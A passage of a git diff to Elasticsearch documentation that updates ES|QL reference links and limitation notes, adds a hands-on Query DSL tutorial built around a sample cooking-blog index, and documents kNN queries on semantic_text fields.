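| KEEP emp_no, first_name
```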
- diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/not like.md b/docs/reference/query-languages/esql/kibana/docs/operators/not like.md index 155eb473c2d93..dde8a60257346 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/not like.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/not like.md @@ -4,11 +4,9 @@ Use `LIKE` to filter data based on string patterns using wildcards. `LIKE` usually acts on a field placed on the left-hand side of the operator, but it can also act on a constant (literal) expression. The right-hand side of the operator -represents the pattern or a list of patterns. If a list of patterns is provided, -the expression will return true if any of the patterns match. +represents the pattern. The following wildcard characters are supported: * `*` matches zero or more characters. * `?` matches one character. - diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/not rlike.md b/docs/reference/query-languages/esql/kibana/docs/operators/not rlike.md index c2b04b4a9de7a..c1b2973f6ffa0 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/not rlike.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/not rlike.md @@ -5,4 +5,3 @@ Use `RLIKE` to filter data based on string patterns using [regular expressions](https://www.elastic.co/docs/reference/query-languages/query-dsl/regexp-syntax). `RLIKE` usually acts on a field placed on the left-hand side of the operator, but it can also act on a constant (literal) expression. The right-hand side of the operator represents the pattern. - diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/predicates.md b/docs/reference/query-languages/esql/kibana/docs/operators/predicates.md deleted file mode 100644 index f40f821193fe5..0000000000000 --- a/docs/reference/query-languages/esql/kibana/docs/operators/predicates.md +++ /dev/null @@ -1,9 +0,0 @@ -% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. - -### PREDICATES -For NULL comparison use the `IS NULL` and `IS NOT NULL` predicates. - -```esql -FROM employees -| WHERE birth_date IS NULL -``` diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/sub.md b/docs/reference/query-languages/esql/kibana/docs/operators/sub.md index 516cd3841a6a1..1fea90a58ec53 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/sub.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/sub.md @@ -2,4 +2,3 @@ ### SUBTRACT `-` Subtract one number from another. If either field is [multivalued](https://www.elastic.co/docs/reference/query-languages/esql/esql-multivalued-fields) then the result is `null`. - diff --git a/docs/reference/query-languages/esql/limitations.md b/docs/reference/query-languages/esql/limitations.md index 83ae009a7d0ca..ed5ebbbf6aa87 100644 --- a/docs/reference/query-languages/esql/limitations.md +++ b/docs/reference/query-languages/esql/limitations.md @@ -8,7 +8,7 @@ mapped_pages: ## Result set size limit [esql-max-rows] -By default, an {{esql}} query returns up to 1,000 rows. You can increase the number of rows up to 10,000 using the [`LIMIT`](/reference/query-languages/esql/commands/processing-commands.md#esql-limit) command. +By default, an {{esql}} query returns up to 1,000 rows. You can increase the number of rows up to 10,000 using the [`LIMIT`](/reference/query-languages/esql/commands/limit.md) command. 
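For example, to raise the row cap on a single query — a sketch; `my-index` and `@timestamp` are placeholders:

```esql
FROM my-index
| SORT @timestamp DESC
| LIMIT 10000
```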
:::{include} _snippets/common/result-set-size-limitation.md ::: @@ -85,7 +85,7 @@ Querying a column with an unsupported type returns an error. If a column with an Some [field types](/reference/elasticsearch/mapping-reference/field-data-types.md) are not supported in all contexts: -* Spatial types are not supported in the [SORT](/reference/query-languages/esql/commands/processing-commands.md#esql-sort) processing command. Specifying a column of one of these types as a sort parameter will result in an error: +* Spatial types are not supported in the [SORT](/reference/query-languages/esql/commands/sort.md) processing command. Specifying a column of one of these types as a sort parameter will result in an error: * `geo_point` * `geo_shape` @@ -93,7 +93,7 @@ Some [field types](/reference/elasticsearch/mapping-reference/field-data-types.m * `cartesian_shape` -In addition, when [querying multiple indexes](docs-content://explore-analyze/query-filter/languages/esql-multi-index.md), it’s possible for the same field to be mapped to multiple types. These fields cannot be directly used in queries or returned in results, unless they’re [explicitly converted to a single type](docs-content://explore-analyze/query-filter/languages/esql-multi-index.md#esql-multi-index-union-types). +In addition, when [querying multiple indexes](/reference/query-languages/esql/esql-multi-index.md), it’s possible for the same field to be mapped to multiple types. These fields cannot be directly used in queries or returned in results, unless they’re [explicitly converted to a single type](/reference/query-languages/esql/esql-multi-index.md#esql-multi-index-union-types). ## _source availability [esql-_source-availability] @@ -104,8 +104,8 @@ In addition, when [querying multiple indexes](docs-content://explore-analyze/que One limitation of [full-text search](/reference/query-languages/esql/functions-operators/search-functions.md) is that it is necessary to use the search function, like [`MATCH`](/reference/query-languages/esql/functions-operators/search-functions.md#esql-match), -in a [`WHERE`](/reference/query-languages/esql/commands/processing-commands.md#esql-where) command directly after the -[`FROM`](/reference/query-languages/esql/commands/source-commands.md#esql-from) source command, or close enough to it. +in a [`WHERE`](/reference/query-languages/esql/commands/where.md) command directly after the +[`FROM`](/reference/query-languages/esql/commands/from.md) source command, or close enough to it. Otherwise, the query will fail with a validation error. For example, this query is valid: @@ -115,7 +115,7 @@ FROM books | WHERE MATCH(author, "Faulkner") AND MATCH(author, "Tolkien") ``` -But this query will fail due to the [STATS](/reference/query-languages/esql/commands/processing-commands.md#esql-stats-by) command: +But this query will fail due to the [STATS](/reference/query-languages/esql/commands/stats-by.md) command: ```esql FROM books @@ -177,10 +177,10 @@ Or consider using one of the [full-text search](/reference/query-languages/esql/ ## Using {{esql}} to query multiple indices [esql-multi-index-limitations] -As discussed in more detail in [Using {{esql}} to query multiple indices](docs-content://explore-analyze/query-filter/languages/esql-multi-index.md), {{esql}} can execute a single query across multiple indices, data streams, or aliases. 
However, there are some limitations to be aware of: +As discussed in more detail in [Using {{esql}} to query multiple indices](/reference/query-languages/esql/esql-multi-index.md), {{esql}} can execute a single query across multiple indices, data streams, or aliases. However, there are some limitations to be aware of: -* All underlying indexes and shards must be active. Using admin commands or UI, it is possible to pause an index or shard, for example by disabling a frozen tier instance, but then any {{esql}} query that includes that index or shard will fail, even if the query uses [`WHERE`](/reference/query-languages/esql/commands/processing-commands.md#esql-where) to filter out the results from the paused index. If you see an error of type `search_phase_execution_exception`, with the message `Search rejected due to missing shards`, you likely have an index or shard in `UNASSIGNED` state. -* The same field must have the same type across all indexes. If the same field is mapped to different types it is still possible to query the indexes, but the field must be [explicitly converted to a single type](docs-content://explore-analyze/query-filter/languages/esql-multi-index.md#esql-multi-index-union-types). +* All underlying indexes and shards must be active. Using admin commands or UI, it is possible to pause an index or shard, for example by disabling a frozen tier instance, but then any {{esql}} query that includes that index or shard will fail, even if the query uses [`WHERE`](/reference/query-languages/esql/commands/where.md) to filter out the results from the paused index. If you see an error of type `search_phase_execution_exception`, with the message `Search rejected due to missing shards`, you likely have an index or shard in `UNASSIGNED` state. +* The same field must have the same type across all indexes. If the same field is mapped to different types it is still possible to query the indexes, but the field must be [explicitly converted to a single type](/reference/query-languages/esql/esql-multi-index.md#esql-multi-index-union-types). ## Time series data streams are not supported [esql-tsdb] @@ -244,9 +244,12 @@ Work around this limitation by converting the field to single value with one of ## Kibana limitations [esql-limitations-kibana] -* The user interface to filter data is not enabled when Discover is in {{esql}} mode. To filter data, write a query that uses the [`WHERE`](/reference/query-languages/esql/commands/processing-commands.md#esql-where) command instead. +* The user interface to filter data is not enabled when Discover is in {{esql}} mode. To filter data, write a query that uses the [`WHERE`](/reference/query-languages/esql/commands/where.md) command instead. * Discover shows no more than 10,000 rows. This limit only applies to the number of rows that are retrieved by the query and displayed in Discover. Queries and aggregations run on the full data set. * Discover shows no more than 50 columns. If a query returns more than 50 columns, Discover only shows the first 50. * CSV export from Discover shows no more than 10,000 rows. This limit only applies to the number of rows that are retrieved by the query and displayed in Discover. Queries and aggregations run on the full data set. -* Querying many indices at once without any filters can cause an error in kibana which looks like `[esql] > Unexpected error from Elasticsearch: The content length (536885793) is bigger than the maximum allowed string (536870888)`. The response from {{esql}} is too long. 
Use [`DROP`](/reference/query-languages/esql/commands/processing-commands.md#esql-drop) or [`KEEP`](/reference/query-languages/esql/commands/processing-commands.md#esql-keep) to limit the number of fields returned. +* Querying many indices at once without any filters can cause an error in Kibana which looks like `[esql] > Unexpected error from Elasticsearch: The content length (536885793) is bigger than the maximum allowed string (536870888)`. The response from {{esql}} is too long. Use [`DROP`](/reference/query-languages/esql/commands/drop.md) or [`KEEP`](/reference/query-languages/esql/commands/keep.md) to limit the number of fields returned. +## Known issues [esql-known-issues] + +Refer to [Known issues](/release-notes/known-issues.md) for a list of known issues for {{esql}}. diff --git a/docs/reference/query-languages/images/elasticsearch-reference-esql-enrich.png b/docs/reference/query-languages/images/elasticsearch-reference-esql-enrich.png new file mode 100644 index 0000000000000..a710c5e543688 Binary files /dev/null and b/docs/reference/query-languages/images/elasticsearch-reference-esql-enrich.png differ diff --git a/docs/reference/query-languages/images/elasticsearch-reference-esql-limit.png b/docs/reference/query-languages/images/elasticsearch-reference-esql-limit.png new file mode 100644 index 0000000000000..26bb09ac52c33 Binary files /dev/null and b/docs/reference/query-languages/images/elasticsearch-reference-esql-limit.png differ diff --git a/docs/reference/query-languages/images/elasticsearch-reference-esql-sort-limit.png b/docs/reference/query-languages/images/elasticsearch-reference-esql-sort-limit.png new file mode 100644 index 0000000000000..685f96d61316a Binary files /dev/null and b/docs/reference/query-languages/images/elasticsearch-reference-esql-sort-limit.png differ diff --git a/docs/reference/query-languages/images/elasticsearch-reference-esql-sort.png b/docs/reference/query-languages/images/elasticsearch-reference-esql-sort.png new file mode 100644 index 0000000000000..35d78acaff744 Binary files /dev/null and b/docs/reference/query-languages/images/elasticsearch-reference-esql-sort.png differ diff --git a/docs/reference/query-languages/images/elasticsearch-reference-source-command.svg b/docs/reference/query-languages/images/elasticsearch-reference-source-command.svg new file mode 100644 index 0000000000000..ebdb6af6785d8 --- /dev/null +++ b/docs/reference/query-languages/images/elasticsearch-reference-source-command.svg @@ -0,0 +1,109 @@ +[109 lines of SVG markup for the source-command syntax diagram] diff --git a/docs/reference/query-languages/query-dsl/full-text-filter-tutorial.md b/docs/reference/query-languages/query-dsl/full-text-filter-tutorial.md new file mode 100644 index 0000000000000..6670abd31676e --- /dev/null +++ b/docs/reference/query-languages/query-dsl/full-text-filter-tutorial.md @@ -0,0 +1,574 @@ +--- +navigation_title: Get started +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/full-text-filter-tutorial.html +applies_to: + stack: ga + serverless: ga +products: + - id: elasticsearch +--- + +# Get started with Query DSL search and filters [full-text-filter-tutorial] + +This is a hands-on introduction to the basics of full-text search with {{es}}, also known as *lexical search*, using the `_search` API and Query DSL. 
+ +In this tutorial, you'll implement a search function for a cooking blog and learn how to filter data to narrow down search results based on exact criteria. +The blog contains recipes with various attributes including textual content, categorical data, and numerical ratings. +The goal is to create search queries to: + +* Find recipes based on preferred or avoided ingredients +* Explore dishes that meet specific dietary needs +* Find top-rated recipes in specific categories +* Find the latest recipes from favorite authors + +To achieve these goals, you'll use different {{es}} queries to perform full-text search, apply filters, and combine multiple search criteria. + +::::{tip} +The code examples are in [Console](docs-content://explore-analyze/query-filter/tools/console.md) syntax by default. +You can [convert into other programming languages](docs-content://explore-analyze/query-filter/tools/console.md#import-export-console-requests) in the Console UI. +:::: + +## Requirements [full-text-filter-tutorial-requirements] + +You can follow these steps in any type of {{es}} deployment. +To see all deployment options, refer to [Choosing your deployment type](docs-content://deploy-manage/deploy.md#choosing-your-deployment-type). +To get started quickly, set up a [single-node local cluster in Docker](docs-content://deploy-manage/deploy/self-managed/local-development-installation-quickstart.md). + +## Create an index [full-text-filter-tutorial-create-index] + +Create the `cooking_blog` index to get started: + +```console +PUT /cooking_blog +``` + +Next, define the mappings for the index: + +```console +PUT /cooking_blog/_mapping +{ + "properties": { + "title": { + "type": "text", + "analyzer": "standard", <1> + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 <2> + } + } + }, + "description": { <3> + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "author": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "date": { + "type": "date", + "format": "yyyy-MM-dd" + }, + "category": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "tags": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "rating": { + "type": "float" + } + } +} +``` + +1. `analyzer`: Used for text analysis. If you don't specify it, the `standard` analyzer is used by default for `text` fields. It's included here for demonstration purposes. To learn more about analyzers, refer to [Anatomy of an analyzer](https://docs-v3-preview.elastic.dev/elastic/docs-content/tree/main/manage-data/data-store/text-analysis/anatomy-of-an-analyzer). +2. `ignore_above`: Prevents indexing values longer than 256 characters in the `keyword` field. This is the default value and it's included here for demonstration purposes. It helps to save disk space and avoid potential issues with Lucene's term byte-length limit. For more information, refer to [ignore_above parameter](/reference/elasticsearch/mapping-reference/ignore-above.md). +3. `description`: A field declared with both `text` and `keyword` [data types](/reference/elasticsearch/mapping-reference/field-data-types.md). Such fields are called [multi-fields](/reference/elasticsearch/mapping-reference/multi-fields.md). This enables both full-text search and exact matching/filtering on the same field. If you use [dynamic mapping](docs-content://manage-data/data-store/mapping/dynamic-field-mapping.md), these multi-fields will be created automatically. 
A few other fields in the mapping, such as `author`, `category`, and `tags`, are also declared as multi-fields. + + + +::::{tip} +Full-text search is powered by [text analysis](docs-content://solutions/search/full-text/text-analysis-during-search.md). Text analysis normalizes and standardizes text data so it can be efficiently stored in an inverted index and searched in near real-time. Analysis happens at both [index and search time](docs-content://manage-data/data-store/text-analysis/index-search-analysis.md). This tutorial won't cover analysis in detail, but it's important to understand how text is processed to create effective search queries. + +:::: + +## Add sample blog posts to your index [full-text-filter-tutorial-index-data] + +Next, index some example blog posts using the [bulk API]({{es-apis}}operation/operation-bulk). Note that `text` fields are analyzed and multi-fields are generated at index time. + +```console +POST /cooking_blog/_bulk?refresh=wait_for +{"index":{"_id":"1"}} +{"title":"Perfect Pancakes: A Fluffy Breakfast Delight","description":"Learn the secrets to making the fluffiest pancakes, so amazing you won't believe your tastebuds. This recipe uses buttermilk and a special folding technique to create light, airy pancakes that are perfect for lazy Sunday mornings.","author":"Maria Rodriguez","date":"2023-05-01","category":"Breakfast","tags":["pancakes","breakfast","easy recipes"],"rating":4.8} +{"index":{"_id":"2"}} +{"title":"Spicy Thai Green Curry: A Vegetarian Adventure","description":"Dive into the flavors of Thailand with this vibrant green curry. Packed with vegetables and aromatic herbs, this dish is both healthy and satisfying. Don't worry about the heat - you can easily adjust the spice level to your liking.","author":"Liam Chen","date":"2023-05-05","category":"Main Course","tags":["thai","vegetarian","curry","spicy"],"rating":4.6} +{"index":{"_id":"3"}} +{"title":"Classic Beef Stroganoff: A Creamy Comfort Food","description":"Indulge in this rich and creamy beef stroganoff. Tender strips of beef in a savory mushroom sauce, served over a bed of egg noodles. It's the ultimate comfort food for chilly evenings.","author":"Emma Watson","date":"2023-05-10","category":"Main Course","tags":["beef","pasta","comfort food"],"rating":4.7} +{"index":{"_id":"4"}} +{"title":"Vegan Chocolate Avocado Mousse","description":"Discover the magic of avocado in this rich, vegan chocolate mousse. Creamy, indulgent, and secretly healthy, it's the perfect guilt-free dessert for chocolate lovers.","author":"Alex Green","date":"2023-05-15","category":"Dessert","tags":["vegan","chocolate","avocado","healthy dessert"],"rating":4.5} +{"index":{"_id":"5"}} +{"title":"Crispy Oven-Fried Chicken","description":"Get that perfect crunch without the deep fryer! This oven-fried chicken recipe delivers crispy, juicy results every time. A healthier take on the classic comfort food.","author":"Maria Rodriguez","date":"2023-05-20","category":"Main Course","tags":["chicken","oven-fried","healthy"],"rating":4.9} +``` + +## Perform basic full-text searches [full-text-filter-tutorial-match-query] + +Full-text search involves executing text-based queries across one or more document fields. These queries calculate a relevance score for each matching document, based on how closely the document's content aligns with the search terms. {{es}} offers various query types, each with its own method for matching text and [relevance scoring](docs-content://explore-analyze/query-filter/languages/querydsl.md#relevance-scores). 
+ +### Use `match` query [_match_query] + +The [`match`](/reference/query-languages/query-dsl/query-dsl-match-query.md) query is the standard query for full-text search. The query text is analyzed using the analyzer configured for each field, unless you override it at query time. + +First, search the `description` field for "fluffy pancakes": + +```console
GET /cooking_blog/_search
{
  "query": {
    "match": {
      "description": {
        "query": "fluffy pancakes" <1>
      }
    }
  }
}
``` + +1. By default, the `match` query uses `OR` logic between the resulting tokens. This means it will match documents that contain either "fluffy" or "pancakes", or both, in the description field. + +At search time, {{es}} defaults to the analyzer defined in the field mapping. This example uses the `standard` analyzer. Using a different analyzer at search time is an [advanced use case](docs-content://manage-data/data-store/text-analysis/index-search-analysis.md#different-analyzers). + +::::{dropdown} Example response
```console-result
{
  "took": 0,
  "timed_out": false,
  "_shards": {
    "total": 1,
    "successful": 1,
    "skipped": 0,
    "failed": 0
  },
  "hits": { <1>
    "total": {
      "value": 1,
      "relation": "eq"
    },
    "max_score": 1.8378843, <2>
    "hits": [
      {
        "_index": "cooking_blog",
        "_id": "1",
        "_score": 1.8378843, <3>
        "_source": {
          "title": "Perfect Pancakes: A Fluffy Breakfast Delight", <4>
          "description": "Learn the secrets to making the fluffiest pancakes, so amazing you won't believe your tastebuds. This recipe uses buttermilk and a special folding technique to create light, airy pancakes that are perfect for lazy Sunday mornings.", <5>
          "author": "Maria Rodriguez",
          "date": "2023-05-01",
          "category": "Breakfast",
          "tags": [
            "pancakes",
            "breakfast",
            "easy recipes"
          ],
          "rating": 4.8
        }
      }
    ]
  }
}
``` + +1. `hits`: Contains the total number of matching documents and their relation to the total. +2. `max_score`: The highest relevance score among all matching documents. In this example, there is only one matching document. +3. `_score`: The relevance score for a specific document, indicating how well it matches the query. Higher scores indicate better matches. In this example the `max_score` is the same as the `_score`, as there is only one matching document. +4. The title contains both "Fluffy" and "Pancakes", matching the search terms exactly. +5. The description includes "fluffiest" and "pancakes", further contributing to the document's relevance due to the analysis process. + +:::: + +### Require all terms in a match query [_require_all_terms_in_a_match_query] + +Specify the `and` operator to require both terms to match in the `description` field.
This stricter search returns *zero hits* on the sample data because no documents contain both "fluffy" and "pancakes" in the description.
+ +```console +GET /cooking_blog/_search +{ + "query": { + "match": { + "description": { + "query": "fluffy pancakes", + "operator": "and" + } + } + } +} +``` + +::::{dropdown} Example response +```console-result +{ + "took": 0, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 0, + "relation": "eq" + }, + "max_score": null, + "hits": [] + } +} +``` + +:::: + + + +### Specify a minimum number of terms to match [_specify_a_minimum_number_of_terms_to_match] + +Use the [`minimum_should_match`](/reference/query-languages/query-dsl/query-dsl-minimum-should-match.md) parameter to specify the minimum number of terms a document should have to be included in the search results. + +Search the title field to match at least 2 of the 3 terms: "fluffy", "pancakes", or "breakfast". This is useful for improving relevance while allowing some flexibility. + +```console +GET /cooking_blog/_search +{ + "query": { + "match": { + "title": { + "query": "fluffy pancakes breakfast", + "minimum_should_match": 2 + } + } + } +} +``` + +## Search across multiple fields [full-text-filter-tutorial-multi-match] + +When you enter a search query, you might not know whether the search terms appear in a specific field. +A [`multi_match`](/reference/query-languages/query-dsl/query-dsl-multi-match-query.md) query enables you to search across multiple fields simultaneously. + +Start with a basic `multi_match` query: + +```console +GET /cooking_blog/_search +{ + "query": { + "multi_match": { + "query": "vegetarian curry", + "fields": ["title", "description", "tags"] + } + } +} +``` + +This query searches for "vegetarian curry" across the title, description, and tags fields. Each field is treated with equal importance. + +However, in many cases, matches in certain fields (like the title) might be more relevant than others. +You can adjust the importance of each field using field boosting: + +```console +GET /cooking_blog/_search +{ + "query": { + "multi_match": { + "query": "vegetarian curry", + "fields": ["title^3", "description^2", "tags"] <1> + } + } +} +``` + +1. The `^` syntax applies a boost to specific fields: + + * `title^3`: The title field is 3 times more important than an unboosted field. + * `description^2`: The description is 2 times more important. + * `tags`: No boost applied (equivalent to `^1`). + + These boosts help tune relevance, prioritizing matches in the title over the description and matches in the description over tags. + +Learn more about fields and per-field boosting in the [`multi_match` query](/reference/query-languages/query-dsl/query-dsl-multi-match-query.md) reference. + +::::{dropdown} Example response +```console-result +{ + "took": 0, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 1, + "relation": "eq" + }, + "max_score": 7.546015, + "hits": [ + { + "_index": "cooking_blog", + "_id": "2", + "_score": 7.546015, + "_source": { + "title": "Spicy Thai Green Curry: A Vegetarian Adventure", <1> + "description": "Dive into the flavors of Thailand with this vibrant green curry. Packed with vegetables and aromatic herbs, this dish is both healthy and satisfying. 
Don't worry about the heat - you can easily adjust the spice level to your liking.", <2> + "author": "Liam Chen", + "date": "2023-05-05", + "category": "Main Course", + "tags": [ + "thai", + "vegetarian", + "curry", + "spicy" + ], <3> + "rating": 4.6 + } + } + ] + } +} +``` + +1. The title contains "Vegetarian" and "Curry", which matches the search terms. The title field has the highest boost (^3), contributing significantly to this document's relevance score. +2. The description contains "curry" and related terms like "vegetables", further increasing the document's relevance. +3. The tags include both "vegetarian" and "curry", providing an exact match for the search terms, albeit with no boost. + +This result demonstrates how the `multi_match` query with field boosts helps you find relevant recipes across multiple fields. +Even though the exact phrase "vegetarian curry" doesn't appear in any single field, the combination of matches across fields produces a highly relevant result. + +:::: + +::::{tip} +The `multi_match` query is often recommended over a single `match` query for most text search use cases because it provides more flexibility and better matches user expectations. +:::: + +## Filter and find exact matches [full-text-filter-tutorial-filtering] + +[Filtering](docs-content://explore-analyze/query-filter/languages/querydsl.md#filter-context) enables you to narrow down your search results based on exact criteria. Unlike full-text searches, filters are binary (yes or no) and do not affect the relevance score. Filters run faster than queries because excluded results don't need to be scored. + +The following [`bool`](/reference/query-languages/query-dsl/query-dsl-bool-query.md) query will return blog posts only in the "Breakfast" category. + +```console +GET /cooking_blog/_search +{ + "query": { + "bool": { + "filter": [ + { "term": { "category.keyword": "Breakfast" } } <1> + ] + } + } +} +``` + +1. Note the use of `category.keyword` here. This refers to the [`keyword`](/reference/elasticsearch/mapping-reference/keyword.md) multi-field of the `category` field, ensuring an exact, case-sensitive match. + + +::::{tip} +The `.keyword` suffix accesses the unanalyzed version of a field, enabling exact, case-sensitive matching. This works in two scenarios: + +1. When using dynamic mapping for text fields. {{es}} automatically creates a `.keyword` sub-field. +2. When text fields are explicitly mapped with a `.keyword` sub-field. For example, you explicitly mapped the `category` field when you defined the mappings for the `cooking_blog` index. +:::: + +### Search within a date range [full-text-filter-tutorial-range-query] + +To find content published within a specific time frame, use a [`range`](/reference/query-languages/query-dsl/query-dsl-range-query.md) query. +It finds documents that fall within numeric or date ranges. + +```console +GET /cooking_blog/_search +{ + "query": { + "range": { + "date": { + "gte": "2023-05-01", <1> + "lte": "2023-05-31" <2> + } + } + } +} +``` + +1. `gte`: Greater than or equal to May 1, 2023. +2. `lte`: Less than or equal to May 31, 2023. + +### Find exact matches [full-text-filter-tutorial-term-query] + +Sometimes you might want to search for exact terms to eliminate ambiguity in the search results. A [`term`](/reference/query-languages/query-dsl/query-dsl-term-query.md) query searches for an exact term in a field without analyzing it. Exact, case-sensitive matches on specific terms are often referred to as "keyword" searches. 
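+
+As a quick illustrative sketch (an aside, not one of the tutorial's steps), consider what happens if you run a `term` query against the analyzed `author` text field instead of its `keyword` multi-field. The `standard` analyzer indexed the lowercase tokens `maria` and `rodriguez`, so the exact term `Maria Rodriguez` does not exist in that field's inverted index:
+
+```console
GET /cooking_blog/_search
{
  "query": {
    "term": {
      "author": "Maria Rodriguez"
    }
  }
}
```
+
+This returns zero hits on the sample data. The query in the next section targets `author.keyword` instead, which stores the unanalyzed value and therefore matches.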
+ +In the following example, you'll search for the author "Maria Rodriguez" in the `author.keyword` field. + +```console
GET /cooking_blog/_search
{
  "query": {
    "term": {
      "author.keyword": "Maria Rodriguez" <1>
    }
  }
}
``` + +1. The `term` query has zero flexibility. For example, searching for the lowercase `maria` or `maria rodriguez` here returns zero hits: the query term must exactly match the stored value `Maria Rodriguez`, including case. + +::::{tip} +Avoid using the `term` query for `text` fields because they are transformed by the analysis process. +:::: + +## Combine multiple search criteria [full-text-filter-tutorial-complex-bool] + +You can use a [`bool`](/reference/query-languages/query-dsl/query-dsl-bool-query.md) query to combine multiple query clauses and create sophisticated searches. +For example, create a query that addresses the following requirements: + +* Must be a vegetarian recipe +* Should contain "curry" or "spicy" in the title or description +* Should be a main course +* Must not be a dessert +* Must have a rating of at least 4.5 +* Should prefer recipes published in the last month + +```console
GET /cooking_blog/_search
{
  "query": {
    "bool": {
      "must": [
        { "term": { "tags": "vegetarian" } },
        {
          "range": {
            "rating": {
              "gte": 4.5
            }
          }
        }
      ],
      "should": [
        {
          "term": {
            "category": "Main Course"
          }
        },
        {
          "multi_match": {
            "query": "curry spicy",
            "fields": [
              "title^2",
              "description"
            ]
          }
        },
        {
          "range": {
            "date": {
              "gte": "now-1M/d"
            }
          }
        }
      ],
      "must_not": [ <1>
        {
          "term": {
            "category.keyword": "Dessert"
          }
        }
      ]
    }
  }
}
``` + +1. `must_not`: Excludes documents that match the specified criteria. This is a powerful tool for filtering out unwanted results. + +::::{dropdown} Example response
```console-result
{
  "took": 1,
  "timed_out": false,
  "_shards": {
    "total": 1,
    "successful": 1,
    "skipped": 0,
    "failed": 0
  },
  "hits": {
    "total": {
      "value": 1,
      "relation": "eq"
    },
    "max_score": 7.444513,
    "hits": [
      {
        "_index": "cooking_blog",
        "_id": "2",
        "_score": 7.444513,
        "_source": {
          "title": "Spicy Thai Green Curry: A Vegetarian Adventure", <1>
          "description": "Dive into the flavors of Thailand with this vibrant green curry. Packed with vegetables and aromatic herbs, this dish is both healthy and satisfying. Don't worry about the heat - you can easily adjust the spice level to your liking.", <2>
          "author": "Liam Chen",
          "date": "2023-05-05", <3>
          "category": "Main Course", <4>
          "tags": [
            "thai",
            "vegetarian", <5>
            "curry",
            "spicy"
          ],
          "rating": 4.6 <6>
        }
      }
    ]
  }
}
``` + +1. The title contains "Spicy" and "Curry", matching the should condition. With the default [best_fields](/reference/query-languages/query-dsl/query-dsl-multi-match-query.md#type-best-fields) behavior, this field contributes most to the relevance score. +2. While the description also contains matching terms, only the best matching field's score is used by default. +3. If the recipe was published within the last month, it would satisfy the recency preference. +4. The "Main Course" category satisfies another `should` condition. +5. The "vegetarian" tag satisfies a `must` condition, while the "curry" and "spicy" tags align with the `should` preferences. +6. The rating of 4.6 meets the minimum rating requirement of 4.5. + +:::: + +## Learn more [full-text-filter-tutorial-learn-more] + +This tutorial introduced the basics of full-text search and filtering in {{es}}.
+Building a real-world search experience requires understanding many more advanced concepts and techniques. +The following resources will help you dive deeper: + +* [Full-text search](docs-content://solutions/search/full-text.md): Learn about the core components of full-text search in {{es}}. +* [{{es}} basics — Search and analyze data](docs-content://explore-analyze/query-filter.md): Understand all your options for searching and analyzing data in {{es}}. +* [Text analysis](docs-content://solutions/search/full-text/text-analysis-during-search.md): Understand how text is processed for full-text search. +* [Search your data](docs-content://solutions/search.md): Learn about more advanced search techniques using the `_search` API, including semantic search. diff --git a/docs/reference/query-languages/query-dsl/query-dsl-knn-query.md b/docs/reference/query-languages/query-dsl/query-dsl-knn-query.md index d5cb9a9ea3fe2..0838dee57d69b 100644 --- a/docs/reference/query-languages/query-dsl/query-dsl-knn-query.md +++ b/docs/reference/query-languages/query-dsl/query-dsl-knn-query.md @@ -97,7 +97,7 @@ The filter is a pre-filter, meaning that it is applied **during** the approximat : (Optional, float) The minimum similarity required for a document to be considered a match. The similarity value calculated relates to the raw [`similarity`](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-similarity) used. Not the document score. The matched documents are then scored according to [`similarity`](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-similarity) and the provided `boost` is applied. -`rescore_vector` +`rescore_vector` {applies_to}`stack: preview 9.0, ga 9.1` : (Optional, object) Apply oversampling and rescoring to quantized vectors. ::::{note} @@ -113,7 +113,9 @@ Rescoring only makes sense for quantized vectors; when [quantization](/reference * Retrieve `num_candidates` candidates per shard. * From these candidates, the top `k * oversample` candidates per shard will be rescored using the original vectors. * The top `k` rescored candidates will be returned. - Must be >= 1f to indicate oversample factor, or exactly `0` to indicate that no oversampling and rescoring should occur. + Must be one of the following values: + * \>= 1f to indicate the oversample factor + * Exactly `0` to indicate that no oversampling and rescoring should occur. {applies_to}`stack: ga 9.1` See [oversampling and rescoring quantized vectors](docs-content://solutions/search/vector/knn.md#dense-vector-knn-search-rescoring) for details. @@ -229,6 +231,36 @@ A sample query can look like below: Note that nested `knn` only supports `score_mode=max`. +## Knn query on a semantic_text field [knn-query-with-semantic-text] + +Elasticsearch supports knn queries over a [ +`semantic_text` field](/reference/elasticsearch/mapping-reference/semantic-text.md). + +Here is an example using the `query_vector_builder`: + +```json +{ + "query": { + "knn": { + "field": "inference_field", + "k": 10, + "num_candidates": 100, + "query_vector_builder": { + "text_embedding": { + "model_text": "test" + } + } + } + } +} +``` + +Note that for `semantic_text` fields, the `model_id` does not have to be +provided as it can be inferred from the `semantic_text` field mapping. + +Knn search using query vectors over `semantic_text` fields is also supported, +with no change to the API. + ## Knn query with aggregations [knn-query-aggregations] `knn` query calculates aggregations on top `k` documents from each shard. 
